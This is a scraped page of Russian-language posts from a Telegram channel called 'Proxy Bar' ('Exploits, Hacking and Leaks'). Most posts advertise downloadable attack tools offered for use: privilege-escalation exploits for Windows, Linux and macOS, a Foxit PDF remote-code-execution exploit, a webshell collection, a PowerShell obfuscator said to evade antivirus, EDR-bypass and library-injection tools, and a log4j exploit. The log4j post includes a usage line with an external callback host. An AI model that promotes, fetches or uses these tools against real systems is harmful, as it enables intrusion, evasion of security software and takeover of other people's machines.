Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.
Исследование, анализ и обход.
Learn

#windows #syscall #bypass
👍6🔥5😱2
SIEM
SIEM Tactics, Techiques, and Procedures
read
👍8🔥3😱3
Пятничная викторина )))

#docker #vuln
👍3
DirCreate2System
Получаем NT AUTHORITY\\SYSTEM
*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system
👍5
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol



#linux #privesc #sec
👍6
CVE-2022-45451
Acronis POC
download
🔥4👍1
Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell
👍8
Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner
👍7🔥5
CVE-2022-28672_exploit.zip
16.3 KB
CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
👍10🔥1
Бэкдоры в FreePBX
PHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))
Пятничное расследование читать

#freepbx #backdoor
🔥7😱3👍2
Dirty Vanity
новая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.
Слайды тут
POC тут

#windows #bypass #edr
🔥6
MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
exploit



#root #macos #exploit
🔥9
powershell-obfuscation
Обфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)
download
🔥12😱3👍2
linux injector

Инжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)
usage:
linux_injector <pid> <module>
Да да, все так просто, иди уже.

download
🔥9😱3👍1
Только ВАЖНЫЕ вопросы !

#hackers #xss
👍22🔥13😱6
Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download

#java #security #web #hack
🔥5👍3
Cloudmare
Палим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.
Но таки да - работает только если криво настроен DNS.
download
🔥14👍2😱1
Php Remote file Inclusion and RCE in flatpressblog/flatpress
Proof of Concept

#php #vuln
👍4
log4j
ДА, еще один, но попроще
usage:
python3 hik.py https://localhost:443 xxx.oastify.com:80

downLoad
🔥9👍1😱1
Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:

Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com

Заказывайте прямо сейчас с уникальной финкой лгбт



Download
👍7🔥3😱3
CVE-2022-2602 - exploit
Опубликован PoC Kernel Privilege Escalation Linux
*
О чем это, прочитать тут_1 и тут_2
*
POC (точнее два) - забрать
Exploit - забрать

#linux #kernel #exploits
😱5